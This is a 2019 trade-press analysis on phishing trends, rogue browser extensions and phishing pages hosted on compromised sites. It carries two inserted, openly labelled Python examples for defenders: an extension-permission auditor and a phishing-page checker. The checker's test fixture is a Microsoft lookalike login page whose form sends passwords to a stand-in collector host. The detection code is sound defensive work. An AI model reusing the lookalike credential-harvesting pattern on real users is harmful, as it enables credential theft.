Dark Reading is part of the Informa Tech Division of Informa PLC


1/2/2019
09:15 AM
Atif Mushtaq
News Analysis-Security Now

Phishing & Social Engineering Attacks Will Rise in 2019

The rise of fileless attack techniques, together with other developments, is making phishing a much more serious problem for enterprise security. As we head into 2019, a new approach is needed.

The cybersecurity field has made great strides in recent years through improvements to email and web security solutions, next-gen antivirus solutions and overall network, operating system and browser hardening.

In turn, threat actors have changed their strategies by adopting hard-to-detect, fileless phishing attacks that exploit the more vulnerable human attack surface. (See New Worm Helps Spread Fileless Version of Bladabindi RAT.)

The threat landscape for 2019 is evolving due to new types of phishing and social engineering attack vectors and methods. These threats are rapidly morphing beyond phishing emails with malicious attachments and now penetrate organizations through browser-based attack vectors designed to trick users into divulging sensitive information or to install man-in-the-browser snoopware that runs stealthily in browser memory.

In short, CSOs and security managers must focus attention on the growing number of threats that leverage malicious sites, regardless of phishing attack vector.

In 2019, cybercriminals will continue to use phishing emails, though the percentage of emails that include malicious attachments will decline as those with malicious links continue to increase. In addition, use of phishing attack vectors beyond email will expand. These vectors include phishing through ads, pop-ups, social media and chat applications. Hackers are also building seemingly legitimate browser extensions that provide useful functionality.

However, these rogue extensions can also act as snoopware to surreptitiously capture credentials that enable additional attacks on the machine or the corporate network.

The battlefield is shifting to compromised websites

As anti-phishing solutions become more adept at spotting newly registered or otherwise suspicious domains, attackers are expanding their use of normally benign but compromised websites to host their phishing pages. A page served from an established, reputable domain inherits that domain's reputation, which helps it avoid detection and blocking by URL filtering systems and web isolation technologies.

An ecosystem of bad actors is emerging to support this activity. Our threat researchers have noticed a growing number of login credentials for otherwise benign websites being offered for sale on the Dark Web. (See Watch Out: The Dark Web Is Really Watching You.)

Let's be clear -- the concern is not about the browser itself becoming exploited through a software vulnerability.

The most popular browsers are being made more secure all the time. The real issue is the widening variety of ways that users are tricked into adding malicious browser extensions that can read what they type and see in the browser, or into clicking a link that silently installs snoopware in browser memory.
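The rogue extensions described here and in the earlier paragraph on seemingly useful extensions have one thing in common: to capture credentials they must declare broad host access plus a way to see page content or requests, and those capabilities sit in plain view in manifest.json. The following Python, added as an example for this edit and not SlashNext's or Dark Reading's code, scores extension manifests on that basis so an inventory can flag snoopware-shaped extensions without knowing a specific bad extension ID. The permission weights, the threshold, the directory walk (browser profiles keep installed extensions under an Extensions directory whose path varies by OS and browser) and the two sample manifests are assumptions constructed for the example.

```python
"""Audit browser extension manifests for snoopware-grade permissions.

Added example, not code from the article or any vendor. Permission weights
are this example's own judgement, not a published scale. Sample manifests
below are constructed.
"""
import json
import os

RISKY_PERMISSIONS = {
    "webRequest": 3,          # observe or modify every request the browser makes
    "webRequestBlocking": 3,
    "cookies": 3,             # read session cookies for any matched host
    "tabs": 1,                # URL and title of every open tab
    "history": 2,
    "clipboardRead": 2,
    "nativeMessaging": 2,     # bridge to a native binary on the host
    "debugger": 3,
}
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def score_manifest(manifest):
    """Return (score, reasons) for one parsed manifest.json (MV2 or MV3)."""
    score, reasons = 0, []
    perms = set(manifest.get("permissions", []))
    # MV3 lists host patterns in host_permissions; MV2 mixes them into permissions.
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    for cs in manifest.get("content_scripts", []):
        hosts |= set(cs.get("matches", []))

    for p in sorted(perms & set(RISKY_PERMISSIONS)):
        score += RISKY_PERMISSIONS[p]
        reasons.append(f"permission {p}")
    if hosts & BROAD_HOST_PATTERNS:
        score += 3
        reasons.append("access to all sites")
    # A content script on every page plus broad access is the classic form-grabber shape.
    if manifest.get("content_scripts") and (hosts & BROAD_HOST_PATTERNS):
        score += 2
        reasons.append("content script injected into every page")
    return score, reasons


def audit_extensions_dir(root, threshold=6):
    """Walk an Extensions directory, score every manifest.json, return flagged ones."""
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        if "manifest.json" not in files:
            continue
        with open(os.path.join(dirpath, "manifest.json"), encoding="utf-8") as fh:
            try:
                manifest = json.load(fh)
            except json.JSONDecodeError:
                continue   # skip damaged manifests rather than abort the audit
        score, reasons = score_manifest(manifest)
        if score >= threshold:
            flagged.append((manifest.get("name", dirpath), score, reasons))
    return sorted(flagged, key=lambda t: -t[1])


# Constructed manifests: a "coupon finder" with form-grabber shape and a
# benign tab counter that only needs 'tabs'.
COUPON_FINDER = {
    "manifest_version": 3, "name": "Coupon Finder Pro", "version": "1.4",
    "permissions": ["webRequest", "cookies", "storage"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
}
TAB_COUNTER = {
    "manifest_version": 3, "name": "Tab Counter", "version": "0.2",
    "permissions": ["tabs"],
}

if __name__ == "__main__":
    for m in (COUPON_FINDER, TAB_COUNTER):
        print(m["name"], score_manifest(m))
```

Run `audit_extensions_dir()` against the profile's Extensions directory on managed endpoints and review anything at or above the threshold; a high score is a prompt to inspect the extension, not proof of malice, since legitimate ad blockers and password managers also request broad host access. Pair the audit with the browser's enterprise policy for extension allowlisting so that unreviewed extensions cannot be installed in the first place.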

Most security teams are aware of these new threats, but they are unclear on how to respond. Firewalls and URL filters are only effective when there is a known malicious URL to block, but attackers have become skillful at quickly standing up new, as-yet-unidentified pages, often on compromised legitimate sites, and taking them down again within hours to avoid detection.

By the time such pages are discovered and blocked, the attack is typically already over and the attackers have moved on. This has driven the rise of anti-phishing technologies that detect phishing sites in real time, or pre-emptively, rather than relying solely on blocklists.
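The practical consequence of the short-lived pages and compromised legitimate sites described above is that domain age and reputation give no signal, so real-time detection has to look at what the page does. The following Python, added here as an example and not part of the original article or any vendor's product, applies two content checks to a page's HTML: a well-known brand name in the title served from a domain that does not belong to that brand, and a password form that posts off-site or over plaintext HTTP. The brand-to-domain table, the crude registrable-domain helper and the two sample pages are constructed assumptions for the example.

```python
"""Content-based phishing page checks.

Added example, not SlashNext's or Dark Reading's code. Catches credential
pages hosted on compromised legitimate sites, where URL reputation is clean.
The brand table and sample HTML are constructed for the example.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse, urljoin

# Illustrative brand-to-legitimate-domain table; a deployment would maintain a fuller one.
BRAND_DOMAINS = {
    "microsoft": {"microsoft.com", "live.com", "office.com", "microsoftonline.com"},
    "paypal": {"paypal.com"},
    "dropbox": {"dropbox.com"},
}


class _FormParser(HTMLParser):
    """Collect the <title> text and, for each <form>, its action and whether it has a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []            # dicts: {"action": str, "password": bool}
        self.title_parts = []
        self._in_title = False
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["password"] = True
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None
        elif tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title_parts.append(data)


def registrable_domain(host):
    """Crude eTLD+1 (last two labels). Fine for the .com-style hosts used here;
    a real deployment would consult the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def phishing_indicators(page_url, html):
    """Return a list of indicator strings for the page; an empty list means nothing was found."""
    parser = _FormParser()
    parser.feed(html)
    page_host = urlparse(page_url).hostname or ""
    page_domain = registrable_domain(page_host)
    indicators = []

    # Brand impersonation: the page claims to be a brand's sign-in but is not on its domain.
    title = " ".join(parser.title_parts).lower()
    for brand, domains in BRAND_DOMAINS.items():
        if brand in title and page_domain not in domains:
            indicators.append(f"brand '{brand}' in title but served from {page_domain}")

    # Credential exfiltration: where does the password actually go?
    for form in parser.forms:
        if not form["password"]:
            continue
        action_url = urlparse(urljoin(page_url, form["action"]))
        if action_url.scheme == "http":
            indicators.append("password form posts over plaintext HTTP")
        action_domain = registrable_domain(action_url.hostname or page_host)
        if action_domain != page_domain:
            indicators.append(f"password form posts off-site to {action_domain}")
    return indicators


# Constructed samples: a compromised recipe blog (clean, long-lived domain) hosting a
# Microsoft-lookalike login, and a company's own intranet login page.
COMPROMISED_BLOG = """
<html><head><title>Sign in to your Microsoft account</title></head>
<body><form action="http://collector.example.net/post.php" method="post">
<input name="login"><input type="password" name="passwd">
<input type="submit" value="Sign in"></form></body></html>
"""
LEGIT_LOGIN = """
<html><head><title>Example Corp intranet login</title></head>
<body><form action="/session" method="post">
<input name="user"><input type="password" name="pass"></form></body></html>
"""

if __name__ == "__main__":
    for url, doc in [("https://recipes-blog.example.org/wp-content/uploads/login.html", COMPROMISED_BLOG),
                     ("https://intranet.example.com/login", LEGIT_LOGIN)]:
        print(url, "->", phishing_indicators(url, doc) or ["clean"])
```

The checks deliberately ignore the URL's reputation: the compromised blog in the sample has a plausible, established domain and would pass a newly-registered-domain filter, yet its page impersonates a brand and posts the password to a third-party host. Real-time systems layer checks like these on top of blocklists precisely because the page's behaviour is harder for the attacker to disguise than its address.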

Fresh approaches to thwarting phishing

Cybercriminals are increasingly turning to social engineering attacks that exploit the human attack surface to evade existing safeguards and gain entry to corporate networks.

These new threats don't directly target the device, the software or the network. The primary target is the employee behind the browser. In other words, the most vulnerable link in the chain is the end user. With more than 4 billion Internet users, each owning several connected devices, and with web usage increasingly common for everyday business tasks, the scope of this problem becomes all too clear.

Security teams will need to deploy new tools and strategies to block phishing threats on the web before users get duped into doing things that compromise their organizations. Ongoing phishing awareness training for employees should be part of any layered security strategy, as should anti-phishing solutions that can detect and help block live web-based phishing threats.

Clearly, this is an ongoing game of cat-and-mouse, with 2019 promising to bring even more sophisticated phishing attacks to manipulate users. As Google and other browser makers crack down on rogue browser extensions and apps, rogue extension makers will devise new ways to avoid detection. (See Google Chrome 71: Bugs Squashed & New Ways to Block 'Abusive Experiences'.)

With so much sensitive information passing through the browser via cloud-based apps and cloud storage systems, tricking users into granting a man-in-the-browser position from which to snoop on that traffic is simply too tempting a target for cybercriminals.


Atif Mushtaq has spent most of his career on the front lines of the war against cybercrime. Before founding SlashNext, he spent nine years as a senior scientist at FireEye, where he was one of the main architects of FireEye's core malware detection system. Mushtaq has worked with law enforcement and other global agencies to take down some of the world’s biggest malware networks.
